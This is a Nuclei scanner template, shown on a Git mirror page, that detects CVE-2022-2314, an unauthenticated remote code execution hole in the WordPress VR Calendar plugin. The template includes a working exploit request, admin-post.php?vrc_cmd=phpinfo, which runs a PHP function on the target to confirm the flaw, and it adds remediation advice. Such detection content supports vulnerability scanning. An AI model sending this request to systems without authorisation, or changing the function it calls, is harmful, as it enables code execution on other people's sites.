daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-2314.yaml

61 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2022-2314
info:
name: WordPress VR Calendar <=2.3.2 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: |
Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
- https://wordpress.org/plugins/vr-calendar-sync/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2314
cwe-id: CWE-78,NVD-CWE-noinfo
epss-score: 0.1981
epss-percentile: 0.95752
cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: vr_calendar_project
product: vr_calendar
framework: wordpress
tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan
http:
- raw:
- |
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "phpinfo"
- "PHP Version"
condition: and
- type: word
part: body_1
words:
- "vrc-calendar"
- type: status
status:
- 200
# digest: 4a0a00473045022015348ab495bd238b92334620a90beb4ac4a2bb8dd28776c42f8c04b88bfe0c50022100e5a2e1c2a43c704e7e4005559bc532ceeeac396db428af1a0985a8871275b598:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink